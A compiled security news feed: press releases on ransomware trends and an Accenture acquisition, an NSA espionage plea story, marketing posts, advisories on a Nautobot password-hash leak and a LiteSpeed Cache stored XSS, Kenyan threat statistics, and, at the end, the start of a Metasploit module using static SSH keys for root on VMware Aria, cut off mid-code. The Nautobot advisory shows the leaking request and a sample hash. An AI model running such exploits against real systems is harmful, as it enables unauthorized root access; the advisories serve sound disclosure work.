**PRESS RELEASE**

**BOSTON--(****BUSINESS WIRE****)--** Corvus Insurance, the leading cyber underwriter powered by a proprietary AI-driven cyber risk platform, today released its Q3 2023 Global Ransomware Report, which analyzes data from ransomware leak sites to track evolving trends. According to the report, ransomware attacks continue at a record-breaking pace, with Q3 2023 global ransomware attack frequency up 11% over Q2 and 95% year-over-year (YoY).

In its Q2 2023 Global Ransomware Report, Corvus noted a significant resurgence in global ransomware attacks, which has continued through the third quarter. Now, with two months remaining in the year, the number of ransomware victims in 2023 has already surpassed what was observed for 2021 and 2022. If the trajectory continues, 2023 will be the first year with more than 4,000 ransomware victims posted on leak sites (2,670 in 2022).

Two key factors drove the elevated Q3 ransomware numbers.

**CL0P Mass Exploits Peaked**

The CL0P ransomware group has played a major role in this spike in 2023 ransomware activity. CL0P sprung to life in Q1 by exploiting GoAnywhere file transfer software, which impacted more than 130 victims. In Q2, CL0P struck again with the solo use of a mass zero-day exploit by a ransomware group targeting a vulnerability in the MOVEit file transfer software, which impacted 264 victims at the time of this report. The single MOVEit vulnerability accounted for 9% of victims listed in Q2 and 13% of victims listed in Q3. Even without these CL0P spikes in attack activity, ransomware numbers would still be up 5% over Q2 and 70% YoY in Q3.

**Threat Actors Cut Summer Breaks Short**

Ransomware typically follows seasonal patterns, with incidents decreasing in early May and remaining low through early August. Driven largely by CL0P, this year’s dip in attacks occurred later in June and, rather than continuing to fall, spiked and remained high through the first half of August. Even without CL0P, ransomware activity would still amount to a 70% year-over-year increase.

“It’s clear that ransomware attacks are on a record-setting pace for 2023, and based on activity at the end of Q3 and early Q4, we fully expect these numbers to surpass anything we have witnessed in previous years,” said Jason Rebholz, CISO, Corvus Insurance. “Aside from these overall numbers, this report demonstrates the impact that a single ransomware group like CL0P can have when they invest in new tactics, which is what we saw with the mass zero-day exploit that wreaked havoc over the second and third quarters.”

**Key Industries Trend Upward**

The Q3 report also examines which industries experienced the largest spikes in ransomware activity. These include:

*   Law practices – An uptick due in part to the ALPHV ransomware group, which accounted for nearly a quarter of all victims in this industry (+70%).
*   Government agencies – The impetus behind these attacks was LockBit, which tripled its government victims from Q2 to Q3 (mostly cities and municipalities) (+95%)
*   Additional Industries that experienced spikes include Manufacturing (+60%), Oil and Gas (+142%), and Transportation, Logistics and Storage (+50%).

“Ransomware actors can quickly pivot their focus, and no industry is immune. There's no better time to ensure the right security controls are in place to mitigate the threat,” said Rebholz.

Read the full Corvus Q3 2023 Global Ransomware Report here.

**About Corvus Insurance**

Corvus Insurance is building a safer world through insurance products and digital tools that reduce risk, increase transparency, and improve resilience for policyholders and program partners. Our market-leading specialty insurance products are enabled by advanced data science and include Smart Cyber Insurance® and Smart Tech E+O®. Our digital platforms and tools enable efficient quoting and binding and proactive risk mitigation. Corvus Insurance offers insurance products in the U.S., Middle East, Europe, Canada, and Australia. Current insurance program partners include Crum & Forster, Hudson Insurance Group, certain underwriters at Lloyd’s of London, R&Q Accredited, SiriusPoint, and The Travelers Companies, Inc. Corvus Insurance, Corvus London Markets, and Corvus Germany are the marketing names used to refer to Corvus Insurance Agency, LLC; Corvus Agency Limited; and Corvus Underwriting GmbH. All entities are subsidiaries of Corvus Insurance Holdings, Inc. Corvus Insurance was founded in 2017 and is headquartered in Boston, Massachusetts with offices across the U.S., in the UK, and Germany. For more information, visit corvusinsurance.com.

2023 Ransomware Attacks Up More Than 95% Over 2022, According to Corvus Insurance Q3 Report

**PRESS RELEASE**

**MEXICO CITY and NEW YORK; Oct. 23, 2023 –** Accenture (NYSE: ACN) has acquired MNEMO Mexico, a privately held company specializing in managed cybersecurity services. Financial terms were not disclosed. 

Founded in Mexico City in 2012, MNEMO Mexico has 229 cybersecurity professionals and 180 cybersecurity industry certifications with key ecosystem partners. The company’s portfolio includes advanced cyber defense and response capabilities, a cyber intelligence platform powered by generative AI and other advanced technologies and a 24/7/365 security operations center in Mexico City. Its client base spans multiple industries, including telecommunications, banking and insurance.

“The combination of MNEMO Mexico’s managed cybersecurity services, extensive industry expertise and strong client base makes them an ideal partner to complement our existing capabilities. The addition of MNEMO Mexico’s team will help us grow our business in Mexico, expand our presence in Latin America and support our North America business,” said Paolo Dal Cin, who leads Accenture Security globally. “Together, we will help organizations build more cyber-resilient businesses and secure their digital cores, technologies and supply chains.”

MNEMO Mexico’s cybersecurity professionals will join Accenture Security’s workforce of more than 19,500 professionals globally, extending Accenture’s local resources and capabilities in Mexico / Latin America while addressing the growing regional demand for managed security services.

“The constantly shifting digital world is both a source of opportunity and risk, making it essential to have a well-trained and proficient cybersecurity team,” said Julian Garrido, General Director of MNEMO Mexico. “For more than 20 years our clients have counted on us to safeguard them against destructive cyberattacks. We are excited to join Accenture Security so we can collaborate across industries to help clients in Mexico and around the world build a secure future.” 

Mexico consistently ranks among the top countries in Latin America hardest hit by cyberattacks. Additionally, a report in collaboration with the World Economic Forum’s Global Cybersecurity Outlook 2023 and Accenture revealed that 59% of business leaders and 64% of cyber leaders ranked talent recruitment and retention as a key challenge for managing cyber resilience. And less than half of respondents reported having the people and skills needed today to respond to cyberattacks.

"We are proud to welcome the MNEMO Mexico team to Accenture. Their robust cybersecurity capabilities and commitment to a collaborative work culture are essential as we look to meet the increasing demand for managed security services in the market," said Andre Fleury, who leads Accenture Security in Latin America. "We are confident that we will bring tremendous talent and capability to our clients."

Accenture recently ranked No. 1 in managed security services (MSS) market share by revenue in the Gartner® Market Share: Managed Security Services, Worldwide, 2022 report, 18 April 2023 \*. **Last year, Accenture** was recognized **as a leader in strategic security services and MSS in Brazil by ISG.**

Since 2015, Accenture Security has made 17 acquisitions. Following its January 2020 acquisition of Symantec’s Cyber Security Services business, Accenture became one of the leading global providers of MSS. Accenture further strengthened its cyber defense and MSS capabilities in Latin America through the acquisition of Brazil-based Morphus earlier this year and its 2021 acquisition of Real Protect.

**Forward-Looking Statements**

Except for the historical information and discussions contained herein, statements in this news release may constitute forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. Words such as “may,” “will,” “should,” “likely,” “anticipates,” “aspires,” “expects,” “intends,” “plans,” “projects,” “believes,” “estimates,” “positioned,” “outlook,” “goal,” “target” and similar expressions are used to identify these forward-looking statements. These statements are not guarantees of future performance nor promises that goals or targets will be met, and involve a number of risks, uncertainties and other factors that are difficult to predict and could cause actual results to differ materially from those expressed or implied. These risks include, without limitation, risks that: the transaction might not achieve the anticipated benefits for Accenture; Accenture’s results of operations have been, and may in the future be, adversely affected by volatile, negative or uncertain economic and political conditions and the effects of these conditions on the company’s clients’ businesses and levels of business activity; Accenture’s business depends on generating and maintaining client demand for the company’s services and solutions including through the adaptation and expansion of its services and solutions in response to ongoing changes in technology and offerings, and a significant reduction in such demand or an inability to respond to the evolving technological environment could materially affect the company’s results of operations; if Accenture is unable to match people and their skills with client demand around the world and attract and retain professionals with strong leadership skills, the company’s business, the utilization rate of the company’s professionals and the company’s results of operations may be materially adversely affected; Accenture faces legal, reputational and financial risks from any failure to protect client and/or company data from security incidents or cyberattacks; the markets in which Accenture operates are highly competitive, and Accenture might not be able to compete effectively; Accenture’s ability to attract and retain business and employees may depend on its reputation in the marketplace; if Accenture does not successfully manage and develop its relationships with key ecosystem partners or fails to anticipate and establish new alliances in new technologies, the company’s results of operations could be adversely affected; Accenture’s profitability could materially suffer if the company is unable to obtain favorable pricing for its services and solutions, if the company is unable to remain competitive, if its cost-management strategies are unsuccessful or if it experiences delivery inefficiencies or fail to satisfy certain agreed-upon targets or specific service levels; changes in Accenture’s level of taxes, as well as audits, investigations and tax proceedings, or changes in tax laws or in their interpretation or enforcement, could have a material adverse effect on the company’s effective tax rate, results of operations, cash flows and financial condition; Accenture’s results of operations could be materially adversely affected by fluctuations in foreign currency exchange rates; changes to accounting standards or in the estimates and assumptions Accenture makes in connection with the preparation of its consolidated financial statements could adversely affect its financial results; as a result of Accenture’s geographically diverse operations and strategy to continue to grow in key markets around the world, the company is more susceptible to certain risks; if Accenture is unable to manage the organizational challenges associated with its size, the company might be unable to achieve its business objectives; Accenture might not be successful at acquiring, investing in or integrating businesses, entering into joint ventures or divesting businesses; Accenture’s business could be materially adversely affected if the company incurs legal liability; Accenture’s global operations expose the company to numerous and sometimes conflicting legal and regulatory requirements; Accenture’s work with government clients exposes the company to additional risks inherent in the government contracting environment; if Accenture is unable to protect or enforce its intellectual property rights or if Accenture’s services or solutions infringe upon the intellectual property rights of others or the company loses its ability to utilize the intellectual property of others, its business could be adversely affected; Accenture may be subject to criticism and negative publicity related to its incorporation in Ireland; as well as the risks, uncertainties and other factors discussed under the “Risk Factors” heading in Accenture plc’s most recent Annual Report on Form 10-K and other documents filed with or furnished to the Securities and Exchange Commission. Statements in this news release speak only as of the date they were made, and Accenture undertakes no duty to update any forward-looking statements made in this news release or to conform such statements to actual results or changes in Accenture’s expectations. 

**About Accenture**    
Accenture is a leading global professional services company that helps the world’s leading businesses, governments and other organizations build their digital core, optimize their operations, accelerate revenue growth and enhance citizen services—creating tangible value at speed and scale. We are a talent- and innovation-led company with approximately 733,000 people serving clients in more than 120 countries. Technology is at the core of change today, and we are one of the world’s leaders in helping drive that change, with strong ecosystem relationships. We combine our strength in technology and leadership in cloud, data and AI with unmatched industry experience, functional expertise and global delivery capability. We are uniquely able to deliver tangible outcomes because of our broad range of services, solutions and assets across Strategy & Consulting, Technology, Operations, Industry X and Song. These capabilities, together with our culture of shared success and commitment to creating 360° value, enable us to help our clients reinvent and build trusted, lasting relationships. We measure our success by the 360° value we create for our clients, each other, our shareholders, partners and communities. Visit us at www.accenture.com. 

**Accenture Security** is a leading provider of end-to-end cybersecurity services, including strategy, protection, resilience and industry-specific cyber services. We bring security innovation, coupled with global scale and a worldwide delivery capability through our network of Cyber Fusion Centers. Helped by our team of highly skilled professionals, we enable clients to innovate safely, build cyber resilience and grow with confidence. Visit us at accenture.com/security.

\*Gartner, Market Share: Managed Security Services, Worldwide, 2022, April 2023. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Accenture Expands Cybersecurity Services Capabilities in Latin America With Acquisition of MNEMO Mexico

The ex-employee claimed that he believed the shared information would benefit Russia and harm the US.

Former National Security Agency (NSA) employee Jareh Dalke has pleaded guilty on six counts after his transmission of classified government materials in an espionage attempt.

While working as an information systems security designer in the summer of 2022, Dalke used an encrypted email to transmit three documents to someone he believed was a Russian Federation agent in an attempt to display his "legitimate access and willingness to share," according to court documents. In truth, the alleged Russian agent was a covert FBI employee. The information Dalke shared contained National Defense Information (NDI).

On Aug. 26, 2022, Dalke requested $85,000 for sharing the classified information, claiming it "would be of value to Russia."

On Sept. 28, Dalke transferred five more files, four containing "Top Secret NDI," by following instructions provided by the covert FBI employee. The fifth file contained a letter reading "My friends! I am very happy to finally provide this information to you … I look forward to our friendship and shared benefit. Please let me know if there are desired documents to find and I will try when I return to my main office."

Dalke was arrested by the FBI after this second transfer of classified information. He admitted as part of a plea deal that he transferred these files believing that the information would be used to aid Russia and harm the US.

Dalke's sentencing is scheduled for April 26, 2024; he faces a maximum penalty of life in prison.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Former NSA Employee Faces Life in Prison After Espionage Attempt

By Owais Sultan
Dive into Manchester’s vibrant influencer marketing scene. Discover key strategies, leading influencer marketing agencies, and how brands are…
This is a post from HackRead.com Read the original post: The Evolution of Influencer Marketing in Manchester, UK

Dive into Manchester’s vibrant influencer marketing scene. Discover key strategies, leading influencer marketing agencies, and how brands are making waves in the UK’s digital realm.

Manchester, a city historically rich with industrial roots, cultural flair, and undeniable charisma, has evolved into a powerhouse in the modern digital age. While many globally recognize it for its iconic football clubs and vibrant music scene, there is another revolution quietly unfurling in its midst: influencer marketing.

In a world that is rapidly digitalizing, the voice of influencers in shaping consumer choices is unmistakably powerful. Meanwhile, in Manchester, this movement is gaining momentum like never before.

With its unusual blend of traditional charm and contemporary vibe, the city is setting the stage for a digital marketing renaissance. As brands are seeking to forge authentic connections in an increasingly virtual world, Manchester’s influencer ecosystem offers a myriad of opportunities.

What is behind this surge, and how are global and local brands harnessing the city’s potential in their digital strategies? Let us embark on this journey through the cobbled streets of Manchester and into its digital realms.

****Manchester’s Unique Digital Landscape****

Manchester, with its intricate tapestry of history and culture, is forging ahead as a beacon for digital prowess. This iconic city, celebrated as the heartbeat of the industrial revolution, is now undergoing a transformative shift, positioning itself at the epicenter of a digital renaissance led by the dynamic world of influencers.

Its cobbled streets and grandiose historic edifices stand in stark contrast, yet in harmonious coexistence, with the burgeoning digital spaces buzzing with the energy of a younger generation. This beautiful interplay between the old and the new sets a captivating backdrop for influencer marketing endeavors.

As businesses delve deep into Manchester’s digital realm, they uncover a realm that is rich in contrasts. It is where tradition meets modernity, where historic grandeur complements digital dynamism. This distinctive Manchester essence provides a refreshing and diversified palette for brands aiming to craft compelling and resonant digital narratives.

****Influencer Marketing Factory and Its Global Approach****

Introducing The Influencer Marketing Factory, the global titan is steering the course of influencer-driven strategies and campaigns. With an operational footprint spanning continents, this influencer marketing agency has firmly anchored its flag in the diverse terrains of the digital world. Manchester, however, is more than just another pin on their global map; it is a testament to their versatility, strategic acumen, and deep-rooted understanding of regional intricacies.

While their global experiences encompass the vibrant hustle of New York’s avenues to the romantically winding waterways of Venice in Manchester, they employ a distinct approach. They harness the city’s unparalleled essence, weaving campaigns that not only echo Manchester’s unique heartbeat but also reverberate on an international scale.

At the core of their success is a balanced alchemy of art and science; they seamlessly marry creative narratives with robust, data-backed strategies. This ensures brands do not just communicate but connect, fostering engagements that are meaningful and memorable with their desired audience.

****Pioneering with Purpose: Brands Making a Difference****

Nestled in the heart of the UK, Manchester boasts a rich tapestry of brands, ranging from time-honored names with legacies spanning decades to innovative start-ups poised to reshape their sectors. For these brands, influencer marketing transcends the conventional. It is not confined to mere product showcases or trending hashtags; it is a potent tool that embodies their missions and visions.

Driven by a deeper sense of purpose, these Manchester-based brands are pioneering a shift in narrative. By aligning with influencers who share their ethos, they champion causes like environmental sustainability, social justice, and community upliftment. It is a symphony of authentic story-telling, where influencers become the voice of the brand’s ideals, reaching out to audiences, sparking conversations, and inspiring action.

The collaborations are no longer just transactional; they are transformational. The resulting narratives resonate on a personal level, stirring emotions and fostering a sense of belonging and shared responsibility among followers. These brands and influencers collectively showcase the true potential of influencer marketing. Their joint efforts underscore a compelling truth: when anchored in authenticity and purpose, influencer marketing not only drives engagement but also catalyzes positive societal change.

****Metrics, Authenticity, and the Path Forward****

In the bustling digital metropolis of Manchester, a significant transformation is underway in the realm of influencer marketing. Gone are the days when surface-level metrics, like fleeting likes or shares, defined success. Today, Manchester’s brands are spearheading a more profound approach, prioritizing depth over breadth. The emphasis has shifted from mere numbers to the quality of interactions, from surface engagements to deep-rooted connections.

Brands, now more discerning, sift through the digital noise to identify influencers whose values align with theirs. It is no longer just about a polished image or a perfectly curated feed; it is about genuine narratives, raw moments, and authentic engagements. The influencer’s ability to foster trust and cultivate a community that truly values their insights and opinions has become paramount.

In this dynamic landscape, both brands and influencers in Manchester are collaboratively weaving tales that resonate deeply with audiences, tales that mirror real-life experiences, challenges, and triumphs. In the meantime, as this evolution gains momentum, it is redefining the contours of influencer marketing. Manchester, with its blend of innovation and tradition, stands as a beacon, heralding an era where authenticity is not just preferred; it is imperative.

****The Bottom Line****

As we navigate the intertwined avenues of Manchester’s digital landscape, one thing becomes clear: the city, with its rich history and dynamic present, is charting a new course for the future of influencer marketing. This is not just a passing trend or a fleeting buzzword in marketing meetings. It is a seismic shift in how brands communicate, connect, and cultivate relationships with their audiences.

With the expertise of agencies like the Influencer Marketing Factory, brands in Manchester are not just participants but pioneers in this new age of marketing. They are crafting stories that resonate, building bridges of trust, and showcasing that authenticity and innovation can go hand in hand.

As we look ahead, Manchester’s influencer marketing landscape promises a blend of creativity, authenticity, and strategic insight. It is an exciting time for brands and influencers alike, and the world watches eagerly as Manchester continues to redefine the digital marketing playbook. The city’s influencer marketing tale is just beginning, and it promises twists, turns, and triumphs in every chapter.

****_RELATED ARTICLES_****

1.  Top SEO Agencies in the UK: Expert Insights
2.  The Most In-Demand Freelance Skills for 2023
3.  Brand Protection is Essential for Cybersecurity
4.  The 10 Best Cybersecurity Companies in the UK
5.  Why you need to install and use Instagram story saver
6.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
7.  Branded Merchandise: The Secret Weapon for Building a Strong Brand Identity

The Evolution of Influencer Marketing in Manchester, UK

### Impact

In Nautobot 2.0.x, certain REST API endpoints, in combination with the `?depth=<N>` query parameter, can expose hashed user passwords as stored in the database to any authenticated user with access to these endpoints. 

> The passwords are *not* exposed in plaintext. 

> Nautobot 1.x is *not* affected by this vulnerability.

Example:

```
GET /api/users/permissions/?depth=1

HTTP 200 OK
API-Version: 2.0
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
```

```json
{
    "count": 1,
    "next": null,
    "previous": null,
    "results": [
        {
            "id": "28ea85e4-5039-4389-94f1-9a3e1c787149",
            "object_type": "users.objectpermission",
            "display": "Run Job",
            "url": "http://localhost:8080/api/users/permissions/28ea85e4-5039-4389-94f1-9a3e1c787149/",
            "natural_slug": "run-job_28ea",
            "object_types": [
                "extras.job"
            ],
            "name": "Run Job",
            "description": "",
            "enabled": true,
            "actions": [
                "run",
                "view"
            ],
            "constraints": null,
            "groups": [
                {
                    "id": 1,
                    "object_type": "auth.group",
                    "display": "A Group",
                    "url": "http://localhost:8080/api/users/groups/1/",
                    "natural_slug": "a-group_1",
                    "name": "A Group"
                }
            ],
            "users": [
                {
                    "id": "e73288e2-1326-4bfb-8fea-041290dd7473",
                    "object_type": "users.user",
                    "display": "admin",
                    "url": "http://localhost:8080/api/users/users/e73288e2-1326-4bfb-8fea-041290dd7473/",
                    "natural_slug": "admin_e732",
                    "password": "pbkdf2_sha256$260000$jQb7hA48HYJ0MLWQgOZiBl$b72+gz6SpZiRpxceRQfT5Zv/aUac0eJ4NdBTZ8ECOow=",
                    "last_login": "2023-10-18T14:19:08.780857Z",
                    "is_superuser": true,
                    "username": "admin",
                    "first_name": "",
                    "last_name": "",
                    "email": "",
                    "is_staff": true,
                    "is_active": true,
                    "date_joined": "2023-10-18T14:18:55.854023Z",
                    "config_data": {}
                }
            ]
        }
    ]
}
```

> Note the "password" field present in the nested `"users"` data.

This information is not exposed during direct access to the `/api/users/users/` endpoint, but can be exposed through any endpoint which contains a nested reference to User object(s) when an appropriate `?depth=<N>` query parameter is specified. Known impacted endpoints include:

- `/api/dcim/rack-reservations/?depth=1`(or any greater `depth` value)
- `/api/extras/job-results/?depth=1` (or any greater `depth` value)
- `/api/extras/notes/?depth=1` (or any greater `depth` value)
- `/api/extras/object-changes/?depth=1` (or any greater `depth` value)
- `/api/extras/scheduled-jobs/?depth=1` (or any greater `depth` value)
- `/api/users/permissions/?depth=1` (or any greater `depth` value)

but this is not necessarily an exhaustive list. 

> Plugin REST API endpoints for any models with a foreign key to the User model may also be impacted by this issue.

> The patch identified below mitigates the issue for both Nautobot core REST APIs and plugin REST APIs; no code change in plugins is required to address this issue.

### Patches

Refer to https://github.com/nautobot/nautobot/pull/4692 for the patch that resolved this issue.

### Workarounds

Upgrading to v2.0.3 or later, or applying the above patch, is the preferred workaround for this issue; while it could also be partially mitigated by updating permissions to deny user access to the above list of impacted REST API endpoints, that is not recommended as other endpoints may also expose this issue until patched.

### References

https://github.com/nautobot/nautobot/pull/4692


**Impact**

In Nautobot 2.0.x, certain REST API endpoints, in combination with the ?depth=<N> query parameter, can expose hashed user passwords as stored in the database to any authenticated user with access to these endpoints.

> The passwords are _not_ exposed in plaintext.

> Nautobot 1.x is _not_ affected by this vulnerability.

Example:

    GET /api/users/permissions/?depth=1
    
    HTTP 200 OK
    API-Version: 2.0
    Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
    Content-Type: application/json
    Vary: Accept
    

{
    "count": 1,
    "next": null,
    "previous": null,
    "results": \[
        {
            "id": "28ea85e4-5039-4389-94f1-9a3e1c787149",
            "object\_type": "users.objectpermission",
            "display": "Run Job",
            "url": "http://localhost:8080/api/users/permissions/28ea85e4-5039-4389-94f1-9a3e1c787149/",
            "natural\_slug": "run-job\_28ea",
            "object\_types": \[
                "extras.job"
            \],
            "name": "Run Job",
            "description": "",
            "enabled": true,
            "actions": \[
                "run",
                "view"
            \],
            "constraints": null,
            "groups": \[
                {
                    "id": 1,
                    "object\_type": "auth.group",
                    "display": "A Group",
                    "url": "http://localhost:8080/api/users/groups/1/",
                    "natural\_slug": "a-group\_1",
                    "name": "A Group"
                }
            \],
            "users": \[
                {
                    "id": "e73288e2-1326-4bfb-8fea-041290dd7473",
                    "object\_type": "users.user",
                    "display": "admin",
                    "url": "http://localhost:8080/api/users/users/e73288e2-1326-4bfb-8fea-041290dd7473/",
                    "natural\_slug": "admin\_e732",
                    "password": "pbkdf2\_sha256$260000$jQb7hA48HYJ0MLWQgOZiBl$b72+gz6SpZiRpxceRQfT5Zv/aUac0eJ4NdBTZ8ECOow=",
                    "last\_login": "2023-10-18T14:19:08.780857Z",
                    "is\_superuser": true,
                    "username": "admin",
                    "first\_name": "",
                    "last\_name": "",
                    "email": "",
                    "is\_staff": true,
                    "is\_active": true,
                    "date\_joined": "2023-10-18T14:18:55.854023Z",
                    "config\_data": {}
                }
            \]
        }
    \]
}

> Note the "password" field present in the nested "users" data.

This information is not exposed during direct access to the /api/users/users/ endpoint, but can be exposed through any endpoint which contains a nested reference to User object(s) when an appropriate ?depth=<N> query parameter is specified. Known impacted endpoints include:

*   /api/dcim/rack-reservations/?depth=1(or any greater depth value)
*   /api/extras/job-results/?depth=1 (or any greater depth value)
*   /api/extras/notes/?depth=1 (or any greater depth value)
*   /api/extras/object-changes/?depth=1 (or any greater depth value)
*   /api/extras/scheduled-jobs/?depth=1 (or any greater depth value)
*   /api/users/permissions/?depth=1 (or any greater depth value)

but this is not necessarily an exhaustive list.

> Plugin REST API endpoints for any models with a foreign key to the User model may also be impacted by this issue.

> The patch identified below mitigates the issue for both Nautobot core REST APIs and plugin REST APIs; no code change in plugins is required to address this issue.

**Patches**

Refer to nautobot/nautobot#4692 for the patch that resolved this issue.

**Workarounds**

Upgrading to v2.0.3 or later, or applying the above patch, is the preferred workaround for this issue; while it could also be partially mitigated by updating permissions to deny user access to the above list of impacted REST API endpoints, that is not recommended as other endpoints may also expose this issue until patched.

**References**

nautobot/nautobot#4692

**References**

*   GHSA-r2hw-74xv-4gqp
*   nautobot/nautobot#4692
*   nautobot/nautobot@1ce8e5c

GHSA-r2hw-74xv-4gqp: Nautobot vulnerable to exposure of hashed user passwords via REST API

By Owais Sultan
Looking for a SaaS SEO consultant? We’ve rounded up the top 15 SaaS SEO experts you need to…
This is a post from HackRead.com Read the original post: 15 Best SaaS SEO Experts That Will Help You Dominate Online

15 Best SaaS SEO Experts That Will Help You Dominate Online

WordPress LiteSpeed Cache plugin versions 5.6 and below suffer from a persistent cross site scripting vulnerability.

    Vulnerability Summary from Wordfence IntelligenceDescription: LiteSpeed Cache <= 5.6 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Affected Plugin: LiteSpeed CachePlugin Slug: litespeed-cacheAffected Versions: <= 5.6CVE ID: CVE-2023-4372CVSS Score: 6.4 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NResearcher/s: Lana Codes Fully Patched Version: <= 5.7The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘esi’ shortcode in versions up to, and including, 5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.Technical AnalysisThe LiteSpeed Cache is a site acceleration plugin with server-level cache and optimization. It provides a shortcode ([esi]) that can be used to cache blocks with Edge Side Includes technology when added to a WordPress page, if ESI was previously enabled in the settings.Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the vulnerable code reveals that the shortcode method in the ESI class does not adequately sanitize the user-supplied ‘cache’ input, and then fails to escape the ‘control’ output derived from the ‘cache’ parameter when it builds the ESI block. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘cache’ attribute.[You can view these code snippets on the blog] This makes it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.Shortcode Exploit PossibilitiesPrevious versions of WordPress contained a vulnerability that allowed shortcodes supplied by unauthenticated commenters to be rendered in certain configurations. This would make it possible for unauthenticated attackers to exploit this Cross-Site Scripting vulnerability on vulnerable installations. Fortunately, however, a vast majority of sites have been automatically upgraded to a patched release of WordPress as of this writing, which means most site owners do not need to be concerned about this. We still strongly recommend verifying your site has been updated to one of the patched versions of WordPress core found here. Disclosure TimelineAugust 14, 2023 – Wordfence Threat Intelligence team discovers the stored XSS vulnerability in LiteSpeed Cache.August 14, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.August 14, 2023 – The vendor confirms the inbox for handling the discussion.August 14, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.August 16, 2023 – The vendor made the patch and sent us the GitHub commit.October 10, 2023 – The fully patched version, 5.7, is released.ConclusionIn this blog post, we have detailed a stored XSS vulnerability within the LiteSpeed Cache plugin affecting versions 5.6 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page. The vulnerability has been fully addressed in version 5.7 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of LiteSpeed Cache.All Wordfence users, including those running Wordfence Premium , Wordfence Care , and Wordfence Response , as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence  and potentially earn a spot on our leaderboard .

WordPress LiteSpeed Cache 5.6 Cross Site Scripting

National response team attributes reduction to a cyber workforce with better training.

Kenya has attributed an 11% decrease in cyber threats to increased training of its frontline cybersecurity personnel, along with greater cybersecurity awareness.

According to the July-September 2023 report from the Kenya Computer Incident Response Team Coordination Centre (KE-CIRT/CC), nearly 124 million cyber threat events were detected — a 11.36% decrease from the 139.7 million threat events detected the previous quarter.

Christopher Wambua, spokesman for the Communications Authority of Kenya, said Kenya's critical information infrastructure was the target for more than 855 million cyber threats between July 2022 and June 2023, making Kenya the third most targeted country in the region, behind South Africa and Nigeria.

Statistics from the report showed that system attacks accounted for over 100 million of the detections. A DDoS attack on its e-citizen digital platform in July was specifically named, as it was briefly inaccessible following a hit claimed by Anonymous Sudan.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cyberattacks on Kenya Drop in Third Quarter

VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 do not randomize the SSH keys on virtual machine initialization. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Exploit::Remote  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',          'Description' => %q{            VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0            do not randomize the SSH keys on virtual machine initialization. Since the key is easily            retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.          },          'Platform' => 'unix',          'Arch' => ARCH_CMD,          'Privileged' => true,          'Targets' => [            [ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],            [ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],            [ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],            [ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],            [ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],            [ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],            [ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],            [ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],            [ '6.4_collector', { 'key' => 